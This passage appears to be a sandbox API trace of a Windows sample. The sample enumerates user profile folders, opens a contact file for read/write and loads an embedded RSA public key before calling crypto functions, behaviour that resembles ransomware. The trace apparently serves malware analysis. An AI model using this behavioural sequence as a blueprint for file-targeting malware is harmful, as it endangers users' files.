hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.693] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.693] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0201.693] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.693] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.693] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.693] PathFindFileNameW (pszPath="") returned="" [0201.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0201.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x37f2b820, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x37f2b820, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0201.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0201.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0201.694] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0201.694] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0201.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0201.694] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.694] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.694] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0201.694] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.694] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.694] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.694] PathFindFileNameW (pszPath="") returned="" [0201.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0201.694] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.694] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.695] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0201.695] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.695] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.695] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.695] PathFindFileNameW (pszPath="") returned="" [0201.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.695] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0201.695] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0201.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0201.696] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1178) returned 1 [0201.696] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0201.698] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.699] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0201.706] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x49a, lpOverlapped=0x0) returned 1 [0201.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0201.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0201.706] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0201.712] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0201.714] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0201.714] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0201.714] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0201.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3740 [0201.715] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3740, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3740, pdwDataLen=0x39cfa54) returned 1 [0201.720] GetLastError () returned 0x0 [0201.726] SetLastError (dwErrCode=0x0) [0201.737] GetLastError () returned 0x0 [0201.737] SetLastError (dwErrCode=0x0) [0201.737] GetLastError () returned 0x0 [0201.737] SetLastError (dwErrCode=0x0) [0201.742] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.743] SetLastError (dwErrCode=0x0) [0201.743] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.744] SetLastError (dwErrCode=0x0) [0201.744] GetLastError () returned 0x0 [0201.745] SetLastError (dwErrCode=0x0) [0201.745] GetLastError () returned 0x0 [0201.745] SetLastError (dwErrCode=0x0) [0201.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0201.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3740 | out: hHeap=0x2c0000) returned 1 [0201.745] CryptDestroyHash (hHash=0x32ef238) returned 1 [0201.745] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0201.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0201.750] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0201.752] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0201.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0201.752] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0201.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0201.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0201.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4a0) returned 0x3310808 [0201.752] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0201.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0201.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0201.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310cb0 [0201.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0201.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384650 [0201.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0201.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc38 [0201.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3780 [0201.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdc50 [0201.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc20 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdbd8 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3740 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdba8 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdbc0 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc08 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdbf0 [0201.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0201.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc80 [0201.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc98 [0201.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0201.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2ee4a8 [0201.843] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2ee4a8, Size=0x218) returned 0x336fc88 [0201.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b6a060 [0201.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0201.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc98 | out: hHeap=0x2c0000) returned 1 [0201.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc80 | out: hHeap=0x2c0000) returned 1 [0201.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0201.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6a060 | out: hHeap=0x2c0000) returned 1 [0201.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc80 [0201.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0201.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdc98 [0201.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b3700 [0201.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdc68 [0201.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0201.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x32b69d8 [0201.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0201.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0201.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x336fea8 [0201.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0201.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc98 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc68 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3700 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0201.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdc80 | out: hHeap=0x2c0000) returned 1 [0201.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0201.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fc88 | out: hHeap=0x2c0000) returned 1 [0201.910] GetCurrentThreadId () returned 0x600 [0201.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x190) returned 0x32ef9d0 [0201.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc80 [0201.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x32b69d8 [0201.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323280 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c1738 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0201.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x32c64e8 [0201.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0201.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0201.943] GetCurrentThreadId () returned 0x600 [0201.943] GetVersionExA (in: lpVersionInformation=0x39cf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x39cf3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x39cf380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0201.943] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76930000 [0201.944] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x74eb0000 [0201.944] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74290000 [0202.192] GetProcAddress (hModule=0x74290000, lpProcName="NetStatisticsGet") returned 0x7429644f [0202.192] GetProcAddress (hModule=0x74290000, lpProcName="NetApiBufferFree") returned 0x742c13d2 [0202.192] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x39cf02c | out: Buffer=0x39cf02c) returned 0x0 [0202.200] GetCurrentThreadId () returned 0x600 [0202.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0202.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0202.201] NetApiBufferFree (Buffer=0x3307c68) returned 0x0 [0202.201] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x39cf02c | out: 